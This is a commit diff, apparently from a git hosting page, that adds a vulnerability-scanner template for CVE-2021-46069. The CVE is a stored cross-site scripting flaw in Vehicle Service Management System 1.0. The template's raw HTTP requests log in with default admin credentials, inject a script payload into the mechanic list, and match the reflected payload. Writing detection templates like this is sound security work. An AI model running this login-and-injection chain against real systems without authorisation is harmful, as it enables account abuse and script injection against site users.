Created CVE-2021-46069
parent
3919e179bb
commit
886b5a6fed
|
@ -0,0 +1,51 @@
|
|||
id: CVE-2021-46069
|
||||
info:
|
||||
name: Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS
|
||||
author: TenBird
|
||||
severity: Medium
|
||||
description: A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-46069
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 4.8
|
||||
cve-id: CVE-2021-46069
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2021,Stored XSS,Cross-Site-Script
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
||||
- |
|
||||
GET /vehicle_service/admin/login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
username=admin&password=admin123
|
||||
|
||||
- |
|
||||
POST /vehicle_service/classes/Master.php?f=save_mechanic HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
id=&name=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&contact=asd1&email=asd1@asd.com&status=1
|
||||
|
||||
- |
|
||||
GET /vehicle_service/admin/?page=mechanics HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
redirects: true
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"><script>alert(document.domain)</script>'
|
Loading…
Reference in New Issue